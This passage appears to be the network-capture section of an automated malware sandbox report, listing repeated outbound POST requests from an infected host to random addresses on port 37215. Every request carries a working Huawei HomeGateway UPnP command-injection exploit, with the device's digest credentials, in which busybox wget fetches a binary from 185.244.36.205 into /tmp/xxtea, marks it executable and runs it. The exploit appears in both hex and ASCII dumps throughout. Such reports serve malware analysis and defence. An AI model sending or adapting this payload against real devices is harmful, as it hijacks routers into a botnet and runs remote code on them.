                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2193192.168.2.1544960121.210.58.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.130796909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2194192.168.2.155913241.175.180.17437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.130830050 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2195192.168.2.1559532156.170.226.2037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.130841970 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2196192.168.2.1557538197.177.150.25537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.130902052 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2197192.168.2.155621231.120.240.19937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.130990982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2198192.168.2.153379814.170.254.9137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.131167889 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2199192.168.2.1541778181.131.103.837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.131169081 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2200192.168.2.155685245.92.224.6737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.131261110 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2201192.168.2.1536586122.98.242.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.131302118 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2202192.168.2.1533338138.185.226.1137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.131580114 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
